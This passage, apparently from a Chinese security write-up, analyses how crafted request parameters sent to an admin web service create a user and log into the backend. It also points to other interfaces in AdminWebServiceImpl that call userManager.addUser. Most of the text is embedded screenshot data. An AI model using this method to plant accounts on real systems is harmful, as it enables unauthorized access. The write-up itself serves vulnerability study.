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
|
|||
|
|
<p blockindex=46>我们把前面构造的两个参数带入到请求包中,成功创建用户</p>
|
|||
|
|
<p blockindex=47><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=48>并使用该用户登录到后台</p>
|
|||
|
|
<p blockindex=49><img src="data:image/png;base64,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
|
|||
|
|
<h2 blockindex=50>0x03 其他利用点</h2>
|
|||
|
|
<p blockindex=51>我们对比两个添加用户的方法发现构造完userbean对象后都调用了<code>this.userManager.addUser</code>方法,我们可以精确搜索</p>
|
|||
|
|
<p blockindex=52><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=53>发现还有其他两个接口可以创建用户。</p>
|
|||
|
|
<p blockindex=54>而在<code>AdminWebServiceImpl</code>的<code>interfaceMethodsMap</code>中除了<code>adduser</code>还有其他方法</p>
|
|||
|
|
<p blockindex=55><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAjcAAABtCAIAAADSwNdBAAAS1klEQVR4nO2dvW7jyJqGPwpYRQKmpWQn2WmqPVZmoBfjC5ACgwKcHV9CHwsDOKUAX4IBK21gQHbfwagzAxa8GPICpjENKPOPRHfSPsGRfDCaYJhwA/6LRYr6oViU3yeyy0UWWZ/JYhWL9ZC1GppMJGusX4rKbpyRIlmFPO6XivbbHf32p/OL8Y3Ub0tGb6xIRCQp440fGtgkMs1dmHkGrmj3OsGyLFoFQ23XOwPnF0kZX5+KK+2HH3bljLoCHVvUzPswQCqeJ+1fpwPB/uW/lJMfTl/le0Bg8+hdujqmS36uyYLd61ZupQAAAIDMKeV9AAAAAEAsaKUAAADwC1opAAAA/JKmldK7QldfdseG2o5u1RXITTLVT/eCNqPHJ+HDV/V52d1zCC9nxKx5Rp4Vgpo/apsEgQSB2urmdmqoG93dC2J74UCMXjDRVirNTW4l1DaR5s09K+9XiYjou7KUQVnJ6Np9+4vp/PI8aX942sT5rnNG8w8CCx8M9K4gCG3VWLqk5Q7Kh5Mm7fSarDFt+F9GPKWDDq16hqFqSqgnvRsI2KauspxjtL1wrBcjUGi2NeJnqNQ5mJ+LKVXLRERU3t+V2bdrnNHwbokmR78aKppC/ZsVmynx9NqyUsyMdb+jGCvDVsZtYr5catS7oFVPMPC5yfanG7uFa3KvtSt3cWY41osRKC6l4FOYobYFod4ZUK9lJwduTO5DW/hxMPIQ5yX60/GJiOh9h5SzUMnN1o